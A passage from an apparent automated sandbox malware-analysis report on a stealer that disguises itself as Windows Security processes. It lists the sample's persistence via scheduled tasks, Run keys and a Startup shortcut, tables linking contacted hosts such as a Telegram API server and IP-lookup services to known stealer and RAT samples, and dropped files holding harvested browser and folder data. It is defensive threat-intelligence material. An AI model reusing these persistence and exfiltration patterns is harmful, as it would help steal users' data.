                              00:16:03API Interceptor1654204x Sleep call for process: Windows Security.exe modified
                              00:16:04API Interceptor3145377x Sleep call for process: Windows Defender Service Host.exe modified
                              00:16:34API Interceptor1885x Sleep call for process: Window Security.exe modified
                              00:16:37API Interceptor818718x Sleep call for process: svchost.exe modified
                              00:16:37API Interceptor869284x Sleep call for process: update.exe modified
                              00:16:59API Interceptor20655x Sleep call for process: Windows Security Health Service.exe modified
                              06:15:58Task SchedulerRun new task: Windows Security Health Service path: "C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"
                              06:15:59Task SchedulerRun new task: Windows Update path: C:\Users\user\AppData\Roaming\Window s>Security.exe
                              06:16:01Task SchedulerRun new task: Windows Defender Service Host path: C:\Users\user\AppData\Roaming\Windows s>Defender Service Host.exe
                              06:16:05AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Defender Service Host C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe
                              06:16:16AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Defender Service Host C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe
                              06:16:27AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender Service Host.lnk

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              149.154.167.220mSpv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                Shipping Documents.bat.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                  iqA8j9yGcd.exeGet hashmaliciousHackBrowser, DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRATBrowse
                                    Setup_IDM.exeGet hashmaliciousFredy StealerBrowse
                                      Setup_IDM.exeGet hashmaliciousFredy StealerBrowse
                                        chiara.exeGet hashmaliciousCryptOne, DarkTortilla, Mofksys, XWormBrowse
                                          RFQ September Order PR 29235 doc-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            RFQ.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              Unmovablety.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                Request for Quotation #P01042.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  208.95.112.1TMPN.exeGet hashmaliciousSkuld StealerBrowse
                                                  • ip-api.com/json
                                                  bkfaf34.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                  • ip-api.com/json/?fields=225545
                                                  1d0000.MSBuild.exeGet hashmaliciousXehook StealerBrowse
                                                  • ip-api.com/json/?fields=11827
                                                  SolaraBoostrapper.exeGet hashmaliciousBlank GrabberBrowse
                                                  • ip-api.com/json/?fields=225545
                                                  05HbyP1HCy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  iqA8j9yGcd.exeGet hashmaliciousHackBrowser, DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRATBrowse
                                                  • ip-api.com/json/
                                                  r7XXceHRzO.exeGet hashmaliciousAgentTeslaBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  SecuriteInfo.com.W32.Autoit.G.gen.Eldorado.11842.7473.exeGet hashmaliciousAgentTeslaBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  znwFR6hkn8.exeGet hashmaliciousAgentTeslaBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  Shipping Documents Cos090224.exeGet hashmaliciousAgentTeslaBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  104.16.185.241Client.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                  • icanhazip.com/
                                                  SecuriteInfo.com.MSIL.MassLogger-G.1448.1172.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                  • icanhazip.com/
                                                  22.08.2024.exeGet hashmaliciousXmrigBrowse
                                                  • icanhazip.com/
                                                  vYz1Z2heor.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                  • icanhazip.com/
                                                  WinRAR 7.01 Pro.exeGet hashmaliciousPureLog Stealer, WorldWind StealerBrowse
                                                  • icanhazip.com/
                                                  PasteHook.exeGet hashmaliciousAsyncRAT, DCRat, StormKitty, WorldWind Stealer, XmrigBrowse
                                                  • icanhazip.com/
                                                  eEo6DAcnnx.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                  • icanhazip.com/
                                                  5oci4lcontract.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                  • icanhazip.com/
                                                  viVOqZjAT0.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                  • icanhazip.com/
                                                  down.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                  • icanhazip.com/

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  ip-api.comTMPN.exeGet hashmaliciousSkuld StealerBrowse
                                                  • 208.95.112.1
                                                  bkfaf34.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                  • 208.95.112.1
                                                  1d0000.MSBuild.exeGet hashmaliciousXehook StealerBrowse
                                                  • 208.95.112.1
                                                  SolaraBoostrapper.exeGet hashmaliciousBlank GrabberBrowse
                                                  • 208.95.112.1
                                                  05HbyP1HCy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 208.95.112.1
                                                  iqA8j9yGcd.exeGet hashmaliciousHackBrowser, DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRATBrowse
                                                  • 208.95.112.1
                                                  r7XXceHRzO.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  SecuriteInfo.com.W32.Autoit.G.gen.Eldorado.11842.7473.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  znwFR6hkn8.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  Shipping Documents Cos090224.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  api.mylnikov.orgclient2.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                  • 104.21.44.66
                                                  Client.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                  • 172.67.196.114
                                                  vYz1Z2heor.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                  • 172.67.196.114
                                                  WinRAR 7.01 Pro.exeGet hashmaliciousPureLog Stealer, WorldWind StealerBrowse
                                                  • 104.21.44.66
                                                  PasteHook.exeGet hashmaliciousAsyncRAT, DCRat, StormKitty, WorldWind Stealer, XmrigBrowse
                                                  • 104.21.44.66
                                                  eEo6DAcnnx.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                  • 172.67.196.114
                                                  83MZfLKh7D.exeGet hashmaliciousAsyncRAT, Discord Token Stealer, Luca Stealer, MicroClip, RedLineBrowse
                                                  • 104.21.44.66
                                                  viVOqZjAT0.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                  • 104.21.44.66
                                                  LisectAVT_2403002B_4.exeGet hashmaliciousAsyncRAT, Neshta, StormKitty, WorldWind StealerBrowse
                                                  • 172.67.196.114
                                                  2U1S7Ab7YU.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                  • 172.67.196.114
                                                  api.telegram.orgmSpv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  Shipping Documents.bat.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  iqA8j9yGcd.exeGet hashmaliciousHackBrowser, DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRATBrowse
                                                  • 149.154.167.220
                                                  Setup_IDM.exeGet hashmaliciousFredy StealerBrowse
                                                  • 149.154.167.220
                                                  Setup_IDM.exeGet hashmaliciousFredy StealerBrowse
                                                  • 149.154.167.220
                                                  chiara.exeGet hashmaliciousCryptOne, DarkTortilla, Mofksys, XWormBrowse
                                                  • 149.154.167.220
                                                  RFQ September Order PR 29235 doc-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  RFQ.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  Unmovablety.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                  • 149.154.167.220
                                                  Request for Quotation #P01042.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  icanhazip.comclient2.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                  • 104.16.184.241
                                                  Client.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                  • 104.16.185.241
                                                  SecuriteInfo.com.MSIL.MassLogger-G.1448.1172.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                  • 104.16.185.241
                                                  22.08.2024.exeGet hashmaliciousXmrigBrowse
                                                  • 104.16.185.241
                                                  vYz1Z2heor.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                  • 104.16.185.241
                                                  4b27fd5c70588d922a25f658f35d5c5d3e0085ba88d9bb9b25746c52b2b58e59_dump.exeGet hashmaliciousPureLog Stealer, SmokeLoader, TrojanRansom, zgRATBrowse
                                                  • 104.16.184.241
                                                  WinRAR 7.01 Pro.exeGet hashmaliciousPureLog Stealer, WorldWind StealerBrowse
                                                  • 104.16.185.241
                                                  PasteHook.exeGet hashmaliciousAsyncRAT, DCRat, StormKitty, WorldWind Stealer, XmrigBrowse
                                                  • 104.16.185.241
                                                  eEo6DAcnnx.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                  • 104.16.185.241
                                                  83MZfLKh7D.exeGet hashmaliciousAsyncRAT, Discord Token Stealer, Luca Stealer, MicroClip, RedLineBrowse
                                                  • 104.16.184.241
                                                  us-east-1.route-1.000webhost.awex.ioNew_Document.jsGet hashmaliciousUnknownBrowse
                                                  • 145.14.145.64
                                                  New_Document.jsGet hashmaliciousUnknownBrowse
                                                  • 145.14.144.16
                                                  https://igphoto6.wixsite.com/websiteGet hashmaliciousUnknownBrowse
                                                  • 145.14.145.230
                                                  Scan0030930930-pdf.jsGet hashmaliciousXWormBrowse
                                                  • 145.14.144.210
                                                  https://01mallboxprofixers.com/fx/rapeir/?email=gbeaver@visitmonmouth.comGet hashmaliciousHTMLPhisherBrowse
                                                  • 145.14.144.173
                                                  http://xaxzim.000webhostapp.com/zimbra.htmlGet hashmaliciousUnknownBrowse
                                                  • 145.14.144.64
                                                  http://zimbra87apoeee.000webhostapp.com/in2p3.htmlGet hashmaliciousUnknownBrowse
                                                  • 145.14.144.213
                                                  zFONuE0fId.exeGet hashmaliciousQuasar, AsyncRAT, DCRat, Orcus, XWormBrowse
                                                  • 145.14.144.78
                                                  Document-pdf.jsGet hashmaliciousXWormBrowse
                                                  • 145.14.144.75
                                                  PurcaseOrder pdf.jsGet hashmaliciousXWormBrowse
                                                  • 145.14.144.151

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  TELEGRAMRUmSpv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  1d0000.MSBuild.exeGet hashmaliciousXehook StealerBrowse
                                                  • 149.154.167.99
                                                  66d5ddcec1520_shtr.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                  • 149.154.167.99
                                                  66d5ddcbb9f86_vyre.exeGet hashmaliciousLummaC, VidarBrowse
                                                  • 149.154.167.99
                                                  Shipping Documents.bat.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  iqA8j9yGcd.exeGet hashmaliciousHackBrowser, DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRATBrowse
                                                  • 149.154.167.220
                                                  Setup_IDM.exeGet hashmaliciousFredy StealerBrowse
                                                  • 149.154.167.220
                                                  Setup_IDM.exeGet hashmaliciousFredy StealerBrowse
                                                  • 149.154.167.220
                                                  chiara.exeGet hashmaliciousCryptOne, DarkTortilla, Mofksys, XWormBrowse
                                                  • 149.154.167.220
                                                  RFQ September Order PR 29235 doc-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  DIGITALOCEAN-ASNUSdjvu452.exeGet hashmaliciousNeconydBrowse
                                                  • 64.225.91.73
                                                  https://digital-mashreq-online-marouanetax95783928.codeanyapp.com/spaceship/spoofi/Issued/cf464/Get hashmaliciousUnknownBrowse
                                                  • 198.199.109.95
                                                  https://dkb-de-startseite-girokonto-factor.codeanyapp.com/Online/Get hashmaliciousUnknownBrowse
                                                  • 198.199.109.95
                                                  SecuriteInfo.com.ELF.Mirai-ARL.6285.13699.elfGet hashmaliciousMiraiBrowse
                                                  • 134.209.74.81
                                                  ListenNowMsgs000037Secs_wav229.htmlGet hashmaliciousHTMLPhisherBrowse
                                                  • 157.230.6.220
                                                  #U00daj fert#U0151z#U0151 betegs#U00e9g.cmd.exeGet hashmaliciousLokibotBrowse
                                                  • 104.248.205.66
                                                  Fizet#U00e9si megb#U00edz#U00e1s.exeGet hashmaliciousLokibotBrowse
                                                  • 104.248.205.66
                                                  RFQ STR-160-01.exeGet hashmaliciousFormBookBrowse
                                                  • 167.172.133.32
                                                  SecuriteInfo.com.Win32.CrypterX-gen.24939.766.exeGet hashmaliciousLokibotBrowse
                                                  • 104.248.205.66
                                                  https://trk.pmifunds.com/y.z?l=http://security1.b-cdn.net&j=375634604&e=3028&p=1&t=h&D6EBE0CCEBB74CE191551D6EE653FA1EGet hashmaliciousHTMLPhisherBrowse
                                                  • 104.248.15.35
                                                  TUT-ASUSTMPN.exeGet hashmaliciousSkuld StealerBrowse
                                                  • 208.95.112.1
                                                  bkfaf34.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                  • 208.95.112.1
                                                  1d0000.MSBuild.exeGet hashmaliciousXehook StealerBrowse
                                                  • 208.95.112.1
                                                  SolaraBoostrapper.exeGet hashmaliciousBlank GrabberBrowse
                                                  • 208.95.112.1
                                                  05HbyP1HCy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 208.95.112.1
                                                  iqA8j9yGcd.exeGet hashmaliciousHackBrowser, DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRATBrowse
                                                  • 208.95.112.1
                                                  r7XXceHRzO.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  SecuriteInfo.com.W32.Autoit.G.gen.Eldorado.11842.7473.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  znwFR6hkn8.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  Shipping Documents Cos090224.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  DIGITALOCEAN-ASNUSdjvu452.exeGet hashmaliciousNeconydBrowse
                                                  • 64.225.91.73
                                                  https://digital-mashreq-online-marouanetax95783928.codeanyapp.com/spaceship/spoofi/Issued/cf464/Get hashmaliciousUnknownBrowse
                                                  • 198.199.109.95
                                                  https://dkb-de-startseite-girokonto-factor.codeanyapp.com/Online/Get hashmaliciousUnknownBrowse
                                                  • 198.199.109.95
                                                  SecuriteInfo.com.ELF.Mirai-ARL.6285.13699.elfGet hashmaliciousMiraiBrowse
                                                  • 134.209.74.81
                                                  ListenNowMsgs000037Secs_wav229.htmlGet hashmaliciousHTMLPhisherBrowse
                                                  • 157.230.6.220
                                                  #U00daj fert#U0151z#U0151 betegs#U00e9g.cmd.exeGet hashmaliciousLokibotBrowse
                                                  • 104.248.205.66
                                                  Fizet#U00e9si megb#U00edz#U00e1s.exeGet hashmaliciousLokibotBrowse
                                                  • 104.248.205.66
                                                  RFQ STR-160-01.exeGet hashmaliciousFormBookBrowse
                                                  • 167.172.133.32
                                                  SecuriteInfo.com.Win32.CrypterX-gen.24939.766.exeGet hashmaliciousLokibotBrowse
                                                  • 104.248.205.66
                                                  https://trk.pmifunds.com/y.z?l=http://security1.b-cdn.net&j=375634604&e=3028&p=1&t=h&D6EBE0CCEBB74CE191551D6EE653FA1EGet hashmaliciousHTMLPhisherBrowse
                                                  • 104.248.15.35

                                                  JA3 Fingerprints

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  54328bd36c14bd82ddaa0c04b25ed9admSpv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 145.14.144.231
                                                  python-installer-3.12.5-amd64.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                  • 145.14.144.231
                                                  Shipping Documents.bat.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                  • 145.14.144.231
                                                  F7ZTvZi9K7.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                  • 145.14.144.231
                                                  dglkNNA6iF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                  • 145.14.144.231
                                                  RFQ September Order PR 29235 doc-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 145.14.144.231
                                                  Unmovablety.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                  • 145.14.144.231
                                                  Request for Quotation #P01042.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 145.14.144.231
                                                  SecuriteInfo.com.Trojan.Locsyz.2.2D0.720.21943.32020.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 145.14.144.231
                                                  Quote E68-STD-094.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 145.14.144.231
                                                  3b5074b1b5d032e5620f69f9f700ff0eBL_CI_PL_Awb_Shipping_Invoice_doc_0002000920242247820020031808174CN18000200092024_pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                  • 149.154.167.220
                                                  • 172.67.196.114
                                                  FATT. N. 2563 DEL 30.08.2024 Antincendi Marche S.r.l..exeGet hashmaliciousAgentTeslaBrowse
                                                  • 149.154.167.220
                                                  • 172.67.196.114
                                                  mSpv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  • 172.67.196.114
                                                  bkfaf34.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                  • 149.154.167.220
                                                  • 172.67.196.114
                                                  Book_0256103.vbeGet hashmaliciousAgentTeslaBrowse
                                                  • 149.154.167.220
                                                  • 172.67.196.114
                                                  https://shore-alkaline-canvas.glitch.me/public/nfcu703553.HTMLGet hashmaliciousHTMLPhisherBrowse
                                                  • 149.154.167.220
                                                  • 172.67.196.114
                                                  https://ggu-lop.vercel.app/Get hashmaliciousUnknownBrowse
                                                  • 149.154.167.220
                                                  • 172.67.196.114
                                                  https://digital-mashreq-online-marouanetax95783928.codeanyapp.com/spaceship/spoofi/Issued/cf464/Get hashmaliciousUnknownBrowse
                                                  • 149.154.167.220
                                                  • 172.67.196.114
                                                  https://secure---page--coinbase-walet--sso.webflow.io/Get hashmaliciousUnknownBrowse
                                                  • 149.154.167.220
                                                  • 172.67.196.114
                                                  https://sso--cdn-en-coinbasepro-cdn-auth.webflow.io/Get hashmaliciousUnknownBrowse
                                                  • 149.154.167.220
                                                  • 172.67.196.114

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\061cde1ab30d4763a998263361c2a7c6\msgid.dat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):4
                                                  Entropy (8bit):2.0
                                                  Encrypted:false
                                                  SSDEEP:3:OXn:OX
                                                  MD5:325EAEAC5BEF34937CFDC1BD73034D17
                                                  SHA1:D30CE1057C96900A624A4423AEDF9F6C7538CA33
                                                  SHA-256:6A4BB0C33BE315E5E095564A3E41488D597F30C3AADC323DA106BEEDF09C403C
                                                  SHA-512:224BD2F8A2924F76AEAE9DA0B01E3B6FCF8077AB69583160B1070C22A7D5FBEE2096639623FB369BB87D515EFE67C8821B5CFCAF1A78C0A4EAB525BE56FACDC0
                                                  Malicious:false
                                                  Preview:6742

                                                  C:\Users\user\AppData\Local\0d4a77c12836fd6bfae0e14cf7959f00\msgid.dat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:very short file (no magic)
                                                  Category:modified
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:V:V
                                                  MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                  SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                  SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                  SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                  Malicious:false
                                                  Preview:0

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Browsers\Firefox\Bookmarks.txt

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):105
                                                  Entropy (8bit):3.8863455911790052
                                                  Encrypted:false
                                                  SSDEEP:3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
                                                  MD5:2E9D094DDA5CDC3CE6519F75943A4FF4
                                                  SHA1:5D989B4AC8B699781681FE75ED9EF98191A5096C
                                                  SHA-256:C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
                                                  SHA-512:D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
                                                  Malicious:false
                                                  Preview:### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Browsers\Firefox\History.txt

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):94
                                                  Entropy (8bit):4.886397362842801
                                                  Encrypted:false
                                                  SSDEEP:3:RGEnGPHA9lfMJJEFAN2DSLvIJiMhKVX3L2WdXuvn:DG/CF0EFAN2OLciA8d+v
                                                  MD5:61CDD7492189720D58F6C5C975D6DFBD
                                                  SHA1:6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43
                                                  SHA-256:2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
                                                  SHA-512:20D5A1C9809DF4F5B9C789042E5B88928A5246F9EB44F9D265CA3AA6FC9544A582B758ECAF6BBB0E9CEE149BD0AAC5E6C63D954541D1B23A7FC11894121CC0AE
                                                  Malicious:false
                                                  Preview:### Firefox Privacy Notice . Mozilla ### (https://www.mozilla.org/en-US/privacy/firefox/) 1.

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Directories\Desktop.txt

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):814
                                                  Entropy (8bit):5.23736360478791
                                                  Encrypted:false
                                                  SSDEEP:24:ChXIYyFteIqxj3Cvj8zSYCE19tDvTPupjucWjq:cXIYseIqxj3CQzSZE19tDrPupjuljq
                                                  MD5:1B0D52E28F02B57E0D1C044E42C567A7
                                                  SHA1:F5D7EFB021881DC867CAEA4EE99597D592B60B30
                                                  SHA-256:1E5407FDF60271E55C10CAB6252CF4706DAFE25AE144D80823F5FCDD372BBB1E
                                                  SHA-512:B5AC9573931BE5E905942FB228655B781285DBDF519E8174F3D772793AD37C82F284CF960EDC7E9B4B64ED535A75A039ED46D7E5F34EE93EE14B2514CBF2C8CF
                                                  Malicious:false
                                                  Preview:Desktop\...DUUDTUBZFW\...EEGWXUHVUG\....BJZFPPWAPT.png....EEGWXUHVUG.docx....EFOYFBOLXA.pdf....GRXZDKKVDB.jpg....NVWZAPQSQL.xlsx....PALRGUCVEH.mp3...EFOYFBOLXA\....EFOYFBOLXA.docx....GIGIYTFFYT.jpg....JDDHMPCDUJ.png....PALRGUCVEH.xlsx....ZGGKNSUKOP.pdf....ZIPXYXWIOY.mp3...EOWRVPQCCS\...GLTYDMDUST\...LIJDSFKJZG\...NVWZAPQSQL\....EIVQSAOTAQ.png....EOWRVPQCCS.jpg....GIGIYTFFYT.mp3....GRXZDKKVDB.xlsx....NVWZAPQSQL.docx....PALRGUCVEH.pdf...QCOILOQIKC\...TQDFJHPUIU\...BJZFPPWAPT.png...BTC.exe...desktop.ini...EEGWXUHVUG.docx...EFOYFBOLXA.docx...EFOYFBOLXA.pdf...EIVQSAOTAQ.png...EOWRVPQCCS.jpg...Excel.lnk...GIGIYTFFYT.jpg...GIGIYTFFYT.mp3...GRXZDKKVDB.jpg...GRXZDKKVDB.xlsx...JDDHMPCDUJ.png...NVWZAPQSQL.docx...NVWZAPQSQL.xlsx...PALRGUCVEH.mp3...PALRGUCVEH.pdf...PALRGUCVEH.xlsx...ZGGKNSUKOP.pdf...ZIPXYXWIOY.mp3..

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Directories\Documents.txt

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):946
                                                  Entropy (8bit):5.374016320731802
                                                  Encrypted:false
                                                  SSDEEP:24:QJhXIYyFteIqxj38xrqEEnvj8zSYCZ9tDvupjucWjq:Q7XIYseIqxj38BqEEnQzSZZ9tDmpjulu
                                                  MD5:7ECFE495FA4D93F25F904F0648C039A2
                                                  SHA1:3153CAE93B272237914852A85357F744328099F9
                                                  SHA-256:A0BA8E7E4D12DA4A13DF2B425F2BD3D2C72CC94795F74E0E2284A7F8F3213FBC
                                                  SHA-512:804589825EC34F9C8B028295EC33BE926F41F0F31B9E2D9DBED3B452515170B78318C1F90BE97C28E9FFCE5DD31DBC6CE60BE2192AA64870FC220017A6C78CED
                                                  Malicious:false
                                                  Preview:Documents\...DUUDTUBZFW\...EEGWXUHVUG\....BJZFPPWAPT.png....EEGWXUHVUG.docx....EFOYFBOLXA.pdf....GRXZDKKVDB.jpg....NVWZAPQSQL.xlsx....PALRGUCVEH.mp3...EFOYFBOLXA\....EFOYFBOLXA.docx....GIGIYTFFYT.jpg....JDDHMPCDUJ.png....PALRGUCVEH.xlsx....ZGGKNSUKOP.pdf....ZIPXYXWIOY.mp3...EOWRVPQCCS\...GLTYDMDUST\...LIJDSFKJZG\...My Music\....desktop.ini...My Pictures\....Camera Roll\.....desktop.ini....Saved Pictures\.....desktop.ini....desktop.ini...My Videos\....desktop.ini...NVWZAPQSQL\....EIVQSAOTAQ.png....EOWRVPQCCS.jpg....GIGIYTFFYT.mp3....GRXZDKKVDB.xlsx....NVWZAPQSQL.docx....PALRGUCVEH.pdf...QCOILOQIKC\...TQDFJHPUIU\...BJZFPPWAPT.png...desktop.ini...EEGWXUHVUG.docx...EFOYFBOLXA.docx...EFOYFBOLXA.pdf...EIVQSAOTAQ.png...EOWRVPQCCS.jpg...GIGIYTFFYT.jpg...GIGIYTFFYT.mp3...GRXZDKKVDB.jpg...GRXZDKKVDB.xlsx...JDDHMPCDUJ.png...NVWZAPQSQL.docx...NVWZAPQSQL.xlsx...PALRGUCVEH.mp3...PALRGUCVEH.pdf...PALRGUCVEH.xlsx...ZGGKNSUKOP.pdf...ZIPXYXWIOY.mp3..

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Directories\Downloads.txt

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):338
                                                  Entropy (8bit):5.296247378390472
                                                  Encrypted:false
                                                  SSDEEP:6:3tcfL6LK0rcNCNWtrB/rvwuuth7kyRh7Wdtslddjgljif/upCWM08NV3:aj6LK0rcNuCt/rvwu6puGdejif/upCWu
                                                  MD5:278EAC32E0DD3806E5F3F391B184947F
                                                  SHA1:618EE22D5D93F252BCEF6EF802F1E97A36B0C445
                                                  SHA-256:788B0C56CAD0EDC8D5AA74B8A4AA971320E9DF9F5DD8602977AA2656096AE179
                                                  SHA-512:4F0386BB38707BF5442D0F5E1DB4B5ACE6A4AD49036FFEAFACF241ABDF2F2EEB15FF350DEC59AFB6BBF078D5288B6D161F46A05AB45956A0E19E05B5AD2A4F84
                                                  Malicious:false
